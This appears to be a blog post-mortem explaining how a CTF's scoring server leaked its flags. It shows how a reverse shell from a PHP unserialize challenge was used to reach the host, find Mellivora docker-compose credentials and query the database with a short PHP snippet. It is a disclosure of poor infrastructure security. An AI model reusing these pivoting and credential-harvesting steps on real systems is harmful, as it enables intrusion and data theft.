First of all, I hope there is no misunderstanding, I didn’t abused the server. During the toss of insomnia, I saw all the flags leaked of the ongoing CTF in CTFTime. Using the reverse shell that was left open through the web challenge a few hours ago, I was able to identify all the causes 10 minutes after the server went down.
It’s not so technical, but I decided to write this down to show explanation for the dumbfounded participants.
Cause
The web challenge Brutus has a vulnerability in PHP unserialize. And It gives remote code execution RCE Privileges to user.
This vuln allows us to create a reverse shell, and It doesn’t have a time-out check. Even after five hours from solved the problem, the connection was still there. Thanks to that, analysis was very comfortable.
By the /etc/hosts file allows you to check the internal IP address of the challenge server is 172.26.0.4. If not specifically managed, so I can expect the address of the host server is 172.26.0.1 or around that.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
www-data@5841bda2da57:/code$ curl 172.26.0.1 <!DOCTYPE HTMLPUBLIC"-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /</title> </head> <body> <h1>Index of /</h1> <table> <tr><thvalign="top"><imgsrc="/icons/blank.gif"alt="[ICO]"></th><th><ahref="?C=N;O=D">Name</a></th><th><ahref="?C=M;O=A">L ast modified</a></th><th><ahref="?C=S;O=A">Size</a></th><th><ahref="?C=D;O=A">Description</a></th></tr> <tr><thcolspan="5"><hr></th></tr> <tr><tdvalign="top"><imgsrc="/icons/folder.gif"alt="[DIR]"></td><td><ahref="mellivora/">mellivora/</a></td><tdalign="right"> 2020-02-21 22:08 </td><tdalign="right"> - </td><td></td></tr> <tr><thcolspan="5"><hr></th></tr> </table> <address>Apache/2.4.29 (Ubuntu) Server at 172.26.0.1 Port 80</address> </body></html>
It seems that a web server works on 172.26.0.1.
Here you can see one folder, and you can see that it’s using the Melivora CTF engine through its name and internal files.
Access to the internal folder was possible, of course, but when you crawl and open it in your browser, it looks like this:
The github page of the melivora engine can be found, and you can also get a hint from the date of modification, and the file docker-compose.dev.yml contains the credential information of CTF engine.
Below is the contents of the file docker-compose.dev.yml.
CTF service is provided through two containers, mysql:5.6 and melivora, using docker-compose . And since database account credential has been leaked, so we can access to CTF database.
1 2 3
$con = new mysqli('172.26.0.1','[redacted]','[redacted]','[redacted]'); $res = $con->query('show databases')->fetch_all(); var_dump($res);
Therefore, using the shell of a web challenge to execute php code in this way, all tables and columns(including user credential and flags) in the database could be leaked, and we can drop all databases since we have root privilege (I didn’t test this unnecessarily)
In this case, it’s because of incredibly bad management. basically, the web services are running on a docker, so there’s no need to install a web server that would be a directory traversal on the host, and to put the contents of the docker stuffs in the webroot.
I don’t know if it’s true, but there are rumors that the organizer of this CTF hasn’t paid the right amount of money for years. (If you know the truth, please leave a comment.)
